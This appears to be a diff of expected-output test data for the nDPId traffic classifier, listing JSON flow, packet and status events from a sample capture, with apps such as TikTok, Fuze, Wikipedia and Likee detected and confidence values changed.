{"version":"TLSv1.2","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623221441867,"flow_last_seen":1623221441911,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623221441911,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"vcs-va.tiktokv.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"sites.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1595957694169,"flow_last_seen":1595957694188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":381,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1623221442073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"69.171.250.20","src_port":46160,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Messenger","breed":"Acceptable","category":"Chat"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":36,"packets-processed":35,"total-skipped-flows":0,"total-l4-payload-len":9095,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":2,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":1623222051753} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623222051753,"flow_last_seen":1623222051753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623222051753,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623222051753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623222051753,"pkt":"pJGxgjQ56CrqthSFCABFAAA0YDdAAIAGW9bAqAHjNElH4sOXAbv6yL58AAAAAIAC+vC20AAAAgQFtAEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623222051852,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623222051852,"pkt":"6CrqthSFpJGxgjQ5CABFAAA0AABAAOkGUw00SUfiwKgB4wG7w5czz+y6+si+fYASaQMoIwAAAgQFtAEBBAIBAwMI"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623222051853,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1623222051853,"pkt":"pJGxgjQ56CrqthSFCABFAAAoYDhAAIAGW+HAqAHjNElH4sOXAbv6yL59M8\/su1AQAgHP+AAAAAAAAAAA"} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222051753,"flow_last_seen":1623222051854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623222051854,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01192{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5798,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","server_names":"*.presence.fuze.com,presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=*.presence.fuze.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"B4:E1:85:91:CD:36:0A:89:7B:6F:A0:C1:11:B5:A5:29:CE:05:13:79"}} -00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":60,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623221441867,"flow_last_seen":1623221458497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8498,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1623222052202,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"}} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623222051753,"flow_last_seen":1623222051854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623222051854,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01192{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1623222051753,"flow_last_seen":1623222051957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5798,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1623222051957,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.fuze.com","server_names":"*.presence.fuze.com,presence.fuze.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=*.presence.fuze.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"B4:E1:85:91:CD:36:0A:89:7B:6F:A0:C1:11:B5:A5:29:CE:05:13:79"}} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":60,"source":"sites.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623221441867,"flow_last_seen":1623221458497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8498,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1623222052202,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"92.122.95.99","src_port":41878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.TikTok","breed":"Fun","category":"SocialNetwork"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":67,"packets-processed":66,"total-skipped-flows":0,"total-l4-payload-len":17875,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":4,"total-updates":0,"current-active-flows":1,"total-active-flows":3,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":26,"global_ts_msec":1623223595952} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223595952,"flow_last_seen":1623223595952,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223595952,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1623223595952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623223595952,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZBhAAEAGCeXAqAGAW8au0MW8AbvaIBcHAAAAAKAC+vC78AAAAgQFtAQCCAq86k7VAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1623223595999,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623223595999,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADEGfP1bxq7QwKgBgAG7xbxrNtsg2iAXCKASqbDzDgAAAgQFnAQCCAoXn7wwvOpO1QEDAwk="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1623223596002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623223596002,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0ZBlAAEAGCezAqAGAW8au0MW8AbvaIBcIazbbIYAQAfbJTQAAAQEICrzqTwcXn7ww"} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223595952,"flow_last_seen":1623223596004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623223596004,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623223595952,"flow_last_seen":1623223596052,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623223596052,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":107,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623222051753,"flow_last_seen":1623222112185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8780,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":1623223596203,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"}} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223595952,"flow_last_seen":1623223596004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1623223596004,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1623223595952,"flow_last_seen":1623223596052,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1623223596052,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"upload.wikimedia.org","ja3":"6b5e0cfe988c723ee71faf54f8460684","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":107,"source":"sites.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1623222051753,"flow_last_seen":1623222112185,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8780,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":1623223596203,"l3_proto":"ip4","src_ip":"192.168.1.227","dst_ip":"52.73.71.226","src_port":50071,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Fuze","breed":"Acceptable","category":"VoIP"}} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":119,"packets-processed":118,"total-skipped-flows":0,"total-l4-payload-len":35609,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":5,"total-updates":0,"current-active-flows":1,"total-active-flows":4,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":34,"global_ts_msec":1623226283573} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623226283573,"flow_last_seen":1623226283573,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623226283573,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1623226283573,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1623226283573,"pkt":"pJGxgjQ5AoEfHBPlCABFAAA8M5RAAEAGJgDAqAH6LVLxM5vSAFAXgCu+AAAAAKAC\/\/9tawAAAgQFtAQCCAolvfRMAAAAAAEDAwk="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1623226283601,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1623226283601,"pkt":"AoEfHBPlpJGxgjQ5CABFAAA0AABAADMGZpwtUvEzwKgB+gBQm9LNImc9F4Arv4ASchAIQAAAAgQFeAEBBAIBAwMK"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1623226283602,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1623226283602,"pkt":"pJGxgjQ5AoEfHBPlCABFAAAoM5VAAEAGJhPAqAH6LVLxM5vSAFAXgCu\/zSJnPlAQAKy6PQAAAAAAAAAA"} -00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226283573,"flow_last_seen":1623226283612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1623226283612,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"videosnap.like.video","url":"videosnap.like.video\/eu_live\/5uz\/1YOmxT.webp?type=8&resize=1&dw=360","code":0,"content_type":"","user_agent":"Like-Android"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":229,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1623223595952,"flow_last_seen":1623223766553,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17734,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1623226286427,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"}} +00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226283573,"flow_last_seen":1623226283612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1623226283612,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"videosnap.like.video","url":"videosnap.like.video\/eu_live\/5uz\/1YOmxT.webp?type=8&resize=1&dw=360","code":0,"content_type":"","user_agent":"Like-Android"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":229,"source":"sites.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1623223595952,"flow_last_seen":1623223766553,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17734,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1623226286427,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"91.198.174.208","src_port":50620,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Wikipedia","breed":"Safe","category":"Web"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":231,"packets-processed":230,"total-skipped-flows":0,"total-l4-payload-len":108050,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":5,"total-updates":0,"current-active-flows":1,"total-active-flows":5,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":41,"global_ts_msec":1631088115362} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631088115362,"flow_last_seen":1631088115362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631088115362,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1631088115362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631088115362,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8aylAAEAG8xTAqAGAx+hSbbaEAbsR7WhdAAAAAKAC+vCzrwAAAgQFtAQCCAqzLdcpAAAAAAEDAwc="} 